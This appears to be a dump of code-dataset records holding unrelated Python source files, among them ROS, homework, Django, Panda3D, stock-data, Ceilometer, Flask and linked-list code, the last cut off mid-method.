\"\"\"\n angle_min = info.angle_min # start angle of the scan [rad]\n angle_max = info.angle_max # end angle of the scan [rad]\n angle_increment = info.angle_increment # angular distance between measurements [rad]\n\n time_increment = info.time_increment # time between measurements [seconds] - if your scanner\n # is moving, this will be used in interpolating position\n # of 3d points\n scan_time = info.scan_time # time between scans [seconds]\n\n range_min = info.range_min # minimum range value [m]\n range_max = info.range_max # maximum range value [m]\n\n ranges = np.array(info.ranges) # range data [m] (Note: values < range_min or > range_max should be discarded)\n intensities = info.intensities\n point_count = len(ranges)\n \n\n\n # Seleccionamos los valores de rango y intensidad que nos interesan (entre +- 57 grados)\n if np.abs(angle_min) > self.angle_range or np.abs(angle_max) > self.angle_range:\n # asumiendo que el rango de ángulos obtenido siempre será mayor que +-57:\n # tomamos desde -57° hasta +57°\n min_index = int((np.abs(angle_min)) / angle_increment) - int(self.angle_range / angle_increment)\n max_index = int((np.abs(angle_min)) / angle_increment) + int(self.angle_range / angle_increment)\n self.ranges = ranges[min_index:max_index]\n self.ranges = ranges[np.where(ranges != 4.0, True, False)]\n self.intensities = intensities[min_index:max_index]\n self.angles = np.arange(angle_min, angle_max+angle_increment, angle_increment)\n \n # print(\"\"\"\n # ----------------------------------------------------------------------\n # ---------------------------laser_reader-------------------------------\n # ----------------------------------------------------------------------\n # \"\"\")\n # print(len(self.ranges))\n # print(self.ranges)\n \nif __name__ == \"__main__\":\n LR = LaserReader()\n rospy.spin()","repo_name":"Austral-IV/rm-ws","sub_path":"src/lab-3/scripts/laser_reader.py","file_name":"laser_reader.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19276586019","text":"#Shiv Lakhanpal\n#svl238\n#hw9.py\n\n\n\n\n#Question 1\n\n\ndef max_abs_value(lst):\n print(max(abs(num) for num in lst))\n return\n\n#Question 2\n\ndef find_all(lst, val):\n lst_2 = []\n for index in range(len(lst)):\n if lst[index] == val:\n lst_2.append(index)\n return lst_2\n\n#Question 3\n\ndef reverse1(lst):\n lst1 = lst[::-1]\n return lst1\n\ndef reverse2(lst2):\n new_lst = lst2[::-1]\n return new_lst\n\ndef main():\n\n lst = [1,2,3,4,5,6] #Input any list of numbers in this\n rev = reverse1(lst)\n print(\"After reverse1, lst is:\",lst,\"and the returned list is:\",rev)\n\n lst2 = [1,2,3,4,5,6] #Input any list of numbers in this\n rev_2 = reverse2(lst)\n print(\"After reverse2, lst2 is: \",rev_2)\n\n\n#Question 4\n\n#Encoder\n\ndef run_length_encoder(string):\n\n lst_enc = [] #Empty List\n count = 1\n char_before= \"\"\n \n for char in string: #The current character in the inputed string\n \n if char != char_before:\n \n if char_before:\n \n lst_encoder = (char_before, count) #List that takes the previous character and the number of times in list\n lst_enc.append(lst_encoder) #Adds the mini list to the final list\n \n count = 1\n char_before = char\n \n else:\n count = count + 1\n else:\n lst_encoder = (char, count)\n lst_enc.append(lst_encoder)\n \n return lst_enc\n\n#Decoder\n \ndef run_length_decoder(lst_enc):\n\n new_string = \"\"\n\n for (char,count) in lst_enc:\n\n new_string += char * count #Multiplies number of times char is in list \n \n return new_string\n\n\n\n\n\n \n\n\n \n \n \n\n\n \n \n \n \n\n\n\n\n","repo_name":"ShivLakhanpal/CS-UY-1114","sub_path":"Homework/Homework 9/hw9.py","file_name":"hw9.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41105602545","text":"from django.core.management.base import BaseCommand\nfrom taiga.projects.choices import BLOCKED_BY_NONPAYMENT\nfrom taiga.projects.models import Project\n\n\nclass Command(BaseCommand):\n help = \"Block user projects\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"owner_usernames\",\n nargs=\"+\",\n help=\"\")\n\n parser.add_argument(\"--is-private\",\n dest=\"is_private\")\n\n parser.add_argument(\"--blocked-code\",\n dest=\"blocked_code\")\n\n def handle(self, *args, **options):\n owner_usernames = options[\"owner_usernames\"]\n projects = Project.objects.filter(owner__username__in=owner_usernames)\n\n is_private = options.get(\"is_private\")\n if is_private is not None:\n is_private = is_private.lower()\n is_private = is_private[0] in [\"t\", \"y\", \"1\"]\n projects = projects.filter(is_private=is_private)\n\n blocked_code = options.get(\"blocked_code\")\n blocked_code = blocked_code if blocked_code is not None else BLOCKED_BY_NONPAYMENT\n projects.update(blocked_code=blocked_code)\n","repo_name":"kaleidos-ventures/taiga-back","sub_path":"taiga/projects/management/commands/block_user_projects.py","file_name":"block_user_projects.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"2"} +{"seq_id":"2695205437","text":"def main(data:str):\n \"\"\"\n The data is from the file. Return data as a list type.\n Args:\n data: str\n Returns:\n list: return answer\n \"\"\"\n r = f.split(',')\n s=[]\n for i in r:\n s+=[int(i)]\n return s\nf = open(\"txt_file/data01.txt\").read()\nprint(main(f))\n# Read data from file","repo_name":"sarikmag/file_handling_homework","sub_path":"file01.py","file_name":"file01.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"10678902252","text":"from sys import stdin\r\n\r\n\r\ndef main():\r\n input = stdin.readline\r\n _ = int(input())\r\n a = list(map(int, input().split()))\r\n _ = int(input())\r\n b = set(map(int, input().split()))\r\n x = int(input())\r\n dp = [False] * (x + 1)\r\n dp[0] = True\r\n mini = 0\r\n while True:\r\n tmp = x\r\n pos = []\r\n for i in range(x, mini - 1, -1):\r\n if dp[i]:\r\n pos.append(i)\r\n if not pos:\r\n print(\"No\")\r\n return\r\n for i in reversed(pos):\r\n for j in a:\r\n if i + j <= x and i + j not in b:\r\n dp[i + j] = True\r\n tmp = min(tmp, i + j)\r\n dp[i] = False\r\n if dp[x]:\r\n print(\"Yes\")\r\n return\r\n mini = tmp\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"yu2799/AtCoder","sub_path":"abc/300/290/289D.py","file_name":"289D.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37880636958","text":" \n\nfrom direct.actor.Actor import Actor\nfrom panda3d.core import Point3\nfrom direct.interval.IntervalGlobal import Sequence, Func, Wait\n\nimport time\nimport math\n\nfrom core import Config\n\n\nclass Agent(Actor):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\nclass MazeRunnerAgent(Agent):\n\n\tdef __init__(\n\t\t\tself, \n\t\t\tpath, \n\t\t\twalk_path=None, \n\t\t\tstep_size=1, \n\t\t\tstep_duration=1,\n\t\t\trotation_size=1,\n\t\t\trotation_duration=1\n\t\t):\n\t\t\n\t\tif walk_path is None:\n\t\t\twalk_path = path\n\t\tsuper().__init__(path, {'walk': walk_path})\n\t\n\t\tself.__traverser = None\n\n\t\tself.__step_size = step_size\n\t\tself.__step_duration = step_duration\n\t\tself.__rotation_size = rotation_size\n\t\tself.__rotation_duration = rotation_duration\n\t\n\t\tself._initial_setup()\n\t\tself._state = self._get_initial_state()\n\n\tdef _get_initial_state(self):\n\t\treturn {\n\t\t\t\t'forward': False,\n\t\t\t\t'left': False,\n\t\t\t\t'right': False\n\t\t\t\t}\n\n\tdef _get_initial_hpr(self):\n\t\treturn (0,0,0)\n\t\n\tdef _get_initial_scale(self):\n\t\treturn (1, 1, 1)\n\n\tdef _initial_setup(self):\n\t\tself.setHpr(*self._get_initial_hpr())\n\t\tself.setScale(*self._get_initial_scale())\n\n\tdef _get_forward_vector(self):\n\t\th = self.getTrueH()\n\t\treturn Point3(-math.sin(math.radians(h)), math.cos(math.radians(h)), 0)\n\n\tdef set_traverser(self, traverser):\n\t\tif self.__traverse is None:\n\t\t\treturn\n\t\tself.__traverser = traverser\n\n\tdef setH(self, h):\n\t\tsuper().setH(self._get_initial_hpr()[0] + h)\n\n\tdef getTrueH(self):\n\t\treturn super().getH() - self._get_initial_hpr()[0]\n\n\tdef walk(self):\n\t\tself._state[\"forward\"] = True\n\t\tself.loop(\"walk\")\n\t\tSequence(\n\t\t\tFunc(self.__keep_walking)\n\t\t).start()\n\n\tdef stop_walking(self):\n\t\tself._state[\"forward\"] = False\n\t\tself.stop()\n\n\tdef __traverse(self):\n\t\tif self.parent is None:\n\t\t\treturn\n\t\tself.__traverser.traverse(self.parent)\n\n\tdef __keep_walking(self):\n\t\t\n\t\tif not self._state[\"forward\"]:\n\t\t\treturn\n\n\t\tSequence(\n\t\t\t\tself.__walk_step(),\n\t\t\t\tFunc(self.__traverse),\n\t\t\t\tFunc(self.__keep_walking),\n\t\t\t).start()\n\n\n\tdef __walk_step(self):\n\t\tfinal_position = (self._get_forward_vector() * self.__step_size) + self.getPos()\n\t\t#print(\"Final Position: %s\" % (final_position,))\n\t\tpos_interval = self.posInterval(self.__step_duration, final_position, startPos=self.getPos())\n\t\t#print(\"Forward Vector: %s\" % self._get_forward_vector())\n\t\n\t\treturn pos_interval\n\n\tdef turn_left(self):\n\t\tself._state[\"left\"] = True\n\t\tself.__turn(1)\n\t\n\tdef turn_right(self):\n\t\tself._state[\"right\"] = True\n\t\tself.__turn(-1)\n\n\tdef stop_turning(self):\n\t\tself._state[\"right\"] = self._state[\"left\"] = False\n\n\tdef __turn(self, direction):\n\t\t\n\t\tkey = \"left\"\n\t\tif direction == -1:\n\t\t\tkey = \"right\"\n\n\t\tif not self._state[key]:\n\t\t\treturn\n\t\n\t\tSequence(\n\t\t\t\tself.hprInterval(\n\t\t\t\t\t\t\tself.__rotation_duration,\n\t\t\t\t\t\t\tself.__calc_turn_step(direction)\n\t\t\t\t\t\t),\n\t\t\t\tFunc(self.__turn, direction)\n\t\t\t).start()\n\t\n\tdef __calc_turn_step(self, direction):\n\n\t\tfinal_hpr = self.getHpr()\n\t\tprint(\"Initial HPR: %s\" % final_hpr)\n\t\tfinal_hpr[0] = final_hpr[0] + self.__rotation_size * direction\n\t\tprint(\"Final HPR: %s\" %final_hpr)\n\t\treturn final_hpr\n\n\n\n\nclass RhinoAgent(MazeRunnerAgent):\n\n\tdef __init__(self):\n\t\tsuper(RhinoAgent, self).__init__(\n\t\t\t\t\t\t\tConfig.RHINO_AGENT_PATH,\n\t\t\t\t\t\t\tstep_size = 0.3,\n\t\t\t\t\t\t\tstep_duration = 0.0001,\n\t\t\t\t\t\t\trotation_size = 5,\n\t\t\t\t\t\t\trotation_duration = 0.1\n\t\t\t\t\t\t)\n\t\n\n\tdef _get_initial_scale(self):\n\t\treturn (0.0005, 0.0005, 0.0005)\n\n\tdef _get_initial_hpr(self):\n\t\treturn (90, -90, 0)\n\n\tdef _initial_setup(self):\n\t\tsuper()._initial_setup()\n\t\tself.play(\"walk\")\n\t\tself.stop()\n","repo_name":"Aklile-Yilma/Maze-3d-game","sub_path":"core/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26072440624","text":"import argparse\nimport wandb\nimport toml\nfrom dotmap import DotMap\n\nfrom agents.ppo import *\nfrom agents.awr import *\n\nimport dm_control.suite as suite\nimport gym\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str)\n parser.add_argument(\"--policy\", type=str, default=\"0\")\n args = parser.parse_args()\n\n config = DotMap(toml.load(args.config))\n\n env = None\n if config.Option.benchmark == \"dm_control\":\n env = suite.load(config.Option.env, config.Option.task)\n elif config.Option.benchmark == \"gym\":\n env = gym.make(config.Option.env)\n env.seed(config.Option.seed)\n\n agent = None\n\n if config.Option.algorithm == \"ppo\":\n agent = PPOAgent(env, config)\n elif config.Option.algorithm == \"awr\":\n agent = AWRAgent(env, config)\n\n if config.Option.wandb:\n wandb.init(project=\"custom-rl-algorithms-test\")\n wandb.config.update(config.toDict())\n\n #get N.N parameters\n model_path = config.Model.model_dir + args.policy + \"th_model_a.pth.tar\"\n agent.test_interact(model_path, random=False)\n\nif __name__==\"__main__\":\n main()\n","repo_name":"DonghyunSung-MS/rl_algorithms","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4327282329","text":"def fact(n):\n if (n < 2):\n return (1)\n return (n * fact(n - 1))\n \ni = 3\ntotal = 0\n\n\nwhile (i < 1000000):\n tmp = i\n sum = 0\n while (tmp != 0):\n sum += fact(tmp % 10)\n tmp //= 10\n if (sum == i):\n total += i\n i += 1\n\nprint(total)\n","repo_name":"jchung05/ProjectEuler","sub_path":"Python/034.py","file_name":"034.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8006422315","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom apps.source.models import Stock\nfrom apps.source.models import StockDailyData\nfrom apps.source.models import TradeCalendar\nimport tushare as ts\nimport threading\nimport math\nimport time\nimport logging\n\n\nclass Command(BaseCommand):\n help = '获取股票日数据'\n thread_num = 10 # 线程数\n all = False # 是否获取全部数据\n start_at = None # 命令行传入的开始日期\n end_at = None # 命令行传入的结束日期\n api_times_pm = 500 # api每分钟请求限制\n thread_api_freq = 0 # 每个线程请求api的频率\n stocks = [] # 命令行传入的股票代码\n stock_objs = [] # 股票集合\n last_date = '' # 从api获取数据时默认的截止日期\n last_trade_date = '' # 上一个交易日\n\n def __init__(self):\n self.logger = logging.getLogger('log')\n ts.set_token(settings.TUSHARE_API_TOKEN)\n\n def add_arguments(self, parser):\n # Named (optional) arguments\n parser.add_argument('--all', action='store_true', dest='all', help='是否拉取全部数据')\n parser.add_argument('--stocks', dest='stocks', help='拉取某些股票的数据')\n parser.add_argument('--start', dest='start_at', help='起始日期')\n parser.add_argument('--end', dest='end_at', help='结束日期')\n parser.add_argument('--tn', dest='thread_num', help='线程数', type=int)\n\n def handle(self, *args, **options):\n self.log('[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ']获取股票日数据脚本开始:')\n # 初始化脚本参数\n self.init_params(args=args, options=options)\n try:\n # 查询符合条件的股票\n query = Stock.objects\n if self.stocks:\n query = query.filter(ts_code__in=self.stocks)\n stocks = query.all()\n self.stock_objs = list(stocks)\n # 多线程拉取数据\n thread_list = []\n for i in range(self.thread_num):\n t = threading.Thread(target=self.cycle_get_queue)\n thread_list.append(t)\n for t in thread_list:\n t.setDaemon(True)\n t.start()\n for t in thread_list:\n t.join()\n except Exception as e:\n self.log('[Exception]' + str(e))\n self.log('[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ']获取股票日数据脚本结束。')\n\n def cycle_get_queue(self):\n while 0 < self.stock_objs.__len__():\n stock = self.stock_objs.pop(0)\n if stock:\n self.handle_one_stock(stock)\n else:\n return\n\n def handle_one_stock(self, stock):\n \"\"\"\n 处理一个股票\n :param stock:\n :return:\n \"\"\"\n # 获取全部数据\n if self.all:\n return self.get_stock_all_data(stock)\n # 获取上一个交易日的数据,判断是否要拉取全部数据\n try:\n stock_last_trade = StockDailyData.objects.filter(ts_code=stock.ts_code,\n trade_date=self.last_trade_date).get()\n except StockDailyData.DoesNotExist:\n return self.get_stock_all_data(stock)\n\n data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=self.last_trade_date,\n end_date=self.last_trade_date)\n if float(stock_last_trade.close) != data.loc[0]['close']:\n print('数据库中上个交易日的数据与api获取的不一致')\n return self.get_stock_all_data(stock)\n # 如果传了start和end参数,则获取这个区间的数据,否则是获取上个交易日到截止日期的数据\n start_at = self.last_trade_date\n if self.start_at:\n start_at = self.start_at\n end_at = self.last_date\n if self.end_at:\n end_at = self.end_at\n print('[' + stock.ts_code + ']' + stock.name + '[' + start_at + '~' + end_at + ']')\n self.get_stock_data(stock=stock, start_date=start_at, end_date=end_at)\n\n def get_stock_all_data(self, stock):\n start_at = stock.list_date\n end_at = self.last_date\n print('[' + stock.ts_code + ']' + stock.name + ',拉取股票全部数据[' + start_at + '~' + end_at + ']')\n self.get_stock_data(stock=stock, start_date=start_at, end_date=end_at)\n\n def get_stock_data(self, stock, start_date, end_date):\n \"\"\"\n 获取股票数据,每次最多获取5000条,每分钟最多请求500次\n :param stock: stock model对象\n :param start_date: 开始日期,格式Ymd,例如19991118\n :param end_date: 结束日期,格式Ymd,例如19991118\n :return:\n \"\"\"\n try:\n # 在起始日期和结束日期之间,每20年循环一次\n start_obj = datetime.strptime(start_date, '%Y%m%d')\n end_obj = datetime.strptime(end_date, '%Y%m%d')\n while start_obj.__le__(end_obj):\n while_start_at = datetime.now()\n after_20_years = start_obj + relativedelta(years=20)\n if after_20_years.__lt__(end_obj):\n print('[' + stock.ts_code + ']' + stock.name + '[' + start_obj.strftime(\n '%Y%m%d') + '~' + after_20_years.strftime(\n '%Y%m%d') + ']')\n data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=start_obj.strftime('%Y%m%d'),\n end_date=after_20_years.strftime('%Y%m%d'))\n start_obj = after_20_years + relativedelta(days=1)\n else:\n print('[' + stock.ts_code + ']' + stock.name + '[' + start_obj.strftime(\n '%Y%m%d') + '~' + end_obj.strftime(\n '%Y%m%d') + ']')\n data = ts.pro_bar(ts_code=stock.ts_code, adj='qfq', start_date=start_obj.strftime('%Y%m%d'),\n end_date=end_obj.strftime('%Y%m%d'))\n start_obj = end_obj + relativedelta(days=1)\n # 写入数据到数据库\n if data is None:\n print(\"数据为None\")\n continue\n for index, item in data.iterrows():\n if math.isnan(item['open']):\n item['open'] = 0.00\n if math.isnan(item['high']):\n item['high'] = 0.00\n if math.isnan(item['low']):\n item['low'] = 0.00\n if math.isnan(item['close']):\n item['close'] = 0.00\n if math.isnan(item['pre_close']):\n item['pre_close'] = 0.00\n if math.isnan(item['change']):\n item['change'] = 0.00\n if math.isnan(item['pct_chg']):\n item['pct_chg'] = 0.00\n if math.isnan(item['vol']):\n item['vol'] = 0.00\n if math.isnan(item['amount']):\n item['amount'] = 0.00\n StockDailyData.objects.update_or_create(defaults=dict(item), ts_code=item['ts_code'],\n trade_date=item['trade_date'])\n time_interval = (datetime.now() - while_start_at).seconds + 1\n if time_interval < self.thread_api_freq:\n diff = self.thread_api_freq - time_interval\n print('循环花了', time_interval, '秒,没有超过频率限制', self.thread_api_freq, '秒,睡眠', diff, '秒')\n time.sleep(diff)\n except IOError:\n self.log(\"请求频繁,睡眠10秒后继续请求\")\n time.sleep(10)\n self.get_stock_data(stock=stock, start_date=start_date, end_date=end_date)\n\n def init_params(self, args, options):\n if options['thread_num']:\n self.thread_num = options['thread_num']\n self.all = options['all']\n if options['stocks']:\n self.stocks = options['stocks'].split(',')\n if options['start_at']:\n self.start_at = options['start_at']\n if options['end_at']:\n self.end_at = options['end_at']\n # 计算截止日期\n today = datetime.now().strftime('%Y%m%d')\n if datetime.now().__ge__(datetime.strptime(today + ' 17:00:00', '%Y%m%d %H:%M:%S')):\n self.last_date = datetime.now().strftime('%Y%m%d')\n else:\n yesterday = datetime.now() - relativedelta(days=1)\n self.last_date = yesterday.strftime('%Y%m%d')\n\n trade_calendar = TradeCalendar.objects.filter(exchange='SSE', cal_date=today).get()\n if not trade_calendar:\n raise Exception(\"获取今天日历失败\")\n self.last_trade_date = trade_calendar.pretrade_date\n # 计算每个线程请求api的频率\n thread_times_pm = math.floor(self.api_times_pm / self.thread_num)\n self.thread_api_freq = math.ceil(60 / thread_times_pm)\n\n def log(self, msg):\n print(msg)\n self.logger.info(msg)\n","repo_name":"gentlemanwuyu/stock","sub_path":"apps/source/management/commands/GetStockDailyData.py","file_name":"GetStockDailyData.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17672845858","text":"# coding=utf-8\n#股票自动交易助手 Python 自动下单使用 例子\n#把此脚本和 StockOrderApi.py Order.dll 放到你自己编写的脚本同一目录\nimport log\nfrom StockOrderApi import *\n\n#买入测试\n#Buy(u\"600000\" , 100, 0, 1, 0)\n\n#卖出测试,是持仓股才会有动作\n# Sell(u\"000042\" , 501, 0, 1, 0)\n\n#账户信息\nlog.log(\"股票自动交易接口测试\")\nlog.log(\"账户信息\")\nlog.log(\"--------------------------------\")\n\narrAccountInfo = [\"总资产\", \"可用资金\", \"持仓总市值\", \"总盈利金额\", \"持仓数量\"];\nfor i in range(0, len(arrAccountInfo)):\n value = GetAccountInfo( u\"\" , i, 0)\n log.log (\"%s %f \"%(arrAccountInfo[i], value))\n\nlog.log(\"--------------------------------\")\nlog.log(\" \")\n\nlog.log(\"股票持仓\")\nlog.log(\"--------------------------------\")\n#取出所有的持仓股票代码,结果以 ','隔开的\nallStockCode = GetAllPositionCode(0)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n vol = GetPosInfo( allStockCodeArray[i] , 0 , 0)\n changeP = GetPosInfo( allStockCodeArray[i] , 4 , 0)\n log.log (\"%s %d %.2f%%\"%(allStockCodeArray[i], vol, changeP))\n\nlog.log(\"--------------------------------\")\n\nlog.log(\"可撤买单\")\nlog.log(\"--------------------------------\")\nallStockCode = GetAllOrderCode(0,1)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n vol = GetOrderInfo( allStockCodeArray[i] , 0 , 0, 0)\n seconds = GetOrderInfo( allStockCodeArray[i] , 0 , 1, 0)\n log.log (\"%s %d %d\"%(allStockCodeArray[i], vol, seconds))\n\nlog.log(\"--------------------------------\")\n\nlog.log(\"可撤卖单\")\nlog.log(\"--------------------------------\")\nallStockCode = GetAllOrderCode(0,2)\nallStockCodeArray = allStockCode.split(',')\nfor i in range(0, len(allStockCodeArray)):\n vol = GetOrderInfo( allStockCodeArray[i] , 1 , 0, 0)\n seconds = GetOrderInfo( allStockCodeArray[i] , 1 , 1, 0)\n log.log (\"%s %d %d\"%(allStockCodeArray[i], vol, seconds))\n\nlog.log(\"--------------------------------\")\n\n#撤买\n# CancelOrder(\"600036\", 1, 0);\n# 撤卖\n# CancelOrder(\"000042\", 2, 0);\n","repo_name":"ImmortalHalfWu/StockOrder","sub_path":"StockOrder.py","file_name":"StockOrder.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"7696219412","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom jsonpath_rw_ext import parser\nfrom oslo_log import log\nimport yaml\n\nfrom ceilometer.i18n import _\n\nLOG = log.getLogger(__name__)\n\n\nclass DefinitionException(Exception):\n def __init__(self, message, definition_cfg=None):\n msg = '%s %s: %s' % (self.__class__.__name__, definition_cfg, message)\n super(DefinitionException, self).__init__(msg)\n self.brief_message = message\n\n\nclass MeterDefinitionException(DefinitionException):\n pass\n\n\nclass EventDefinitionException(DefinitionException):\n pass\n\n\nclass ResourceDefinitionException(DefinitionException):\n pass\n\n\nclass DynamicPollsterException(DefinitionException):\n pass\n\n\nclass DynamicPollsterDefinitionException(DynamicPollsterException):\n pass\n\n\nclass InvalidResponseTypeException(DynamicPollsterException):\n pass\n\n\nclass NonOpenStackApisDynamicPollsterException\\\n (DynamicPollsterDefinitionException):\n pass\n\n\nclass Definition(object):\n JSONPATH_RW_PARSER = parser.ExtentedJsonPathParser()\n GETTERS_CACHE = {}\n\n def __init__(self, name, cfg, plugin_manager):\n self.cfg = cfg\n self.name = name\n self.plugin = None\n if isinstance(cfg, dict):\n if 'fields' not in cfg:\n raise DefinitionException(\n _(\"The field 'fields' is required for %s\") % name,\n self.cfg)\n\n if 'plugin' in cfg:\n plugin_cfg = cfg['plugin']\n if isinstance(plugin_cfg, str):\n plugin_name = plugin_cfg\n plugin_params = {}\n else:\n try:\n plugin_name = plugin_cfg['name']\n except KeyError:\n raise DefinitionException(\n _('Plugin specified, but no plugin name supplied '\n 'for %s') % name, self.cfg)\n plugin_params = plugin_cfg.get('parameters')\n if plugin_params is None:\n plugin_params = {}\n try:\n plugin_ext = plugin_manager[plugin_name]\n except KeyError:\n raise DefinitionException(\n _('No plugin named %(plugin)s available for '\n '%(name)s') % dict(\n plugin=plugin_name,\n name=name), self.cfg)\n plugin_class = plugin_ext.plugin\n self.plugin = plugin_class(**plugin_params)\n\n fields = cfg['fields']\n else:\n # Simple definition \"foobar: jsonpath\"\n fields = cfg\n\n if isinstance(fields, list):\n # NOTE(mdragon): if not a string, we assume a list.\n if len(fields) == 1:\n fields = fields[0]\n else:\n fields = '|'.join('(%s)' % path for path in fields)\n\n if isinstance(fields, int):\n self.getter = fields\n else:\n try:\n self.getter = self.make_getter(fields)\n except Exception as e:\n raise DefinitionException(\n _(\"Parse error in JSONPath specification \"\n \"'%(jsonpath)s' for %(name)s: %(err)s\")\n % dict(jsonpath=fields, name=name, err=e), self.cfg)\n\n def _get_path(self, match):\n if match.context is not None:\n for path_element in self._get_path(match.context):\n yield path_element\n yield str(match.path)\n\n def parse(self, obj, return_all_values=False):\n if callable(self.getter):\n values = self.getter(obj)\n else:\n return self.getter\n\n values = [match for match in values\n if return_all_values or match.value is not None]\n\n if self.plugin is not None:\n if return_all_values and not self.plugin.support_return_all_values:\n raise DefinitionException(\"Plugin %s don't allows to \"\n \"return multiple values\" %\n self.cfg[\"plugin\"][\"name\"], self.cfg)\n values_map = [('.'.join(self._get_path(match)), match.value) for\n match in values]\n values = [v for v in self.plugin.trait_values(values_map)\n if v is not None]\n else:\n values = [match.value for match in values if match is not None]\n if return_all_values:\n return values\n else:\n return values[0] if values else None\n\n def make_getter(self, fields):\n if fields in self.GETTERS_CACHE:\n return self.GETTERS_CACHE[fields]\n else:\n getter = self.JSONPATH_RW_PARSER.parse(fields).find\n self.GETTERS_CACHE[fields] = getter\n return getter\n\n\ndef load_definitions(conf, defaults, config_file, fallback_file=None):\n \"\"\"Setup a definitions from yaml config file.\"\"\"\n\n if not os.path.exists(config_file):\n config_file = conf.find_file(config_file)\n if not config_file and fallback_file is not None:\n LOG.debug(\"No Definitions configuration file found! \"\n \"Using default config.\")\n config_file = fallback_file\n\n if config_file is not None:\n LOG.debug(\"Loading definitions configuration file: %s\", config_file)\n\n with open(config_file) as cf:\n config = cf.read()\n\n try:\n definition_cfg = yaml.safe_load(config)\n except yaml.YAMLError as err:\n if hasattr(err, 'problem_mark'):\n mark = err.problem_mark\n errmsg = (_(\"Invalid YAML syntax in Definitions file \"\n \"%(file)s at line: %(line)s, column: %(column)s.\")\n % dict(file=config_file,\n line=mark.line + 1,\n column=mark.column + 1))\n else:\n errmsg = (_(\"YAML error reading Definitions file \"\n \"%(file)s\")\n % dict(file=config_file))\n LOG.error(errmsg)\n raise\n\n else:\n LOG.debug(\"No Definitions configuration file found! \"\n \"Using default config.\")\n definition_cfg = defaults\n\n LOG.debug(\"Definitions: %s\", definition_cfg)\n return definition_cfg\n","repo_name":"openstack/ceilometer","sub_path":"ceilometer/declarative.py","file_name":"declarative.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"2"} +{"seq_id":"5150825831","text":"from flask import Flask, request, render_template, make_response\nfrom flask.helpers import make_response\nfrom werkzeug.wrappers import response\nfrom API import weather\n\n\napp = Flask(__name__) \n#daily_weather = [0, 0, 0, -1, -2, -1, 1, 1, 3, 5, 6, 6, 6, 9, 10, 10, 8, 7, 5, 3, 0, 0, -1, -2] # Celsium\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef index():\n if request.method == \"GET\":\n city = request.args.get(\"userCity\")\n if not city:\n city = request.cookies.get(\"city\") \n print(city)\n daily_weather = weather.get_weather(city=city)\n if not city:\n response.set.cookie(\"city\", city)\n response = make_response(render_template(\"weather.html\",enumerate=enumerate, weather=daily_weather))\n response.set_cookie(\"city\", city)\n return response\n@app.route(\"/cookie\")\ndef cookie():\n response = make_response(\"Coookie\") \n response.set_cookie(\"robotCookie\", \"This is one test of cookie\", max_age = 60*60*24)\n return response\n@app.route(\"/check_cookie\")\ndef chek_cookie():\n if request.cookies.get(\"robotCookie\"):\n response = make_response(f\"Your cookie {request.cookies.get('robotCookie')}🍪\")\n else:\n response = \"0\"\n return response\n\n\n\n\naddr = \"127.0.0.1\"\napp.run(host=addr,port=80,debug=True)","repo_name":"AlanaKokoeva/Weather-Site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4739659331","text":"class Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\nclass LinkedList:\n\n def __init__(self, next=None):\n self.head = None\n self.next = next\n\n def insert(self, value):\n self.head = Node(value, self.head)\n\n def append(self, value):\n current = self.head\n if current:\n while current.next != None:\n current = current.next\n current.next = Node(value)\n else:\n self.head = Node(value, self.head)\n\n def insert_before(self, value, position):\n new = Node(value)\n pointer = self.head\n counter = 1\n if position == 0:\n new.next = self.head\n self.head = new\n 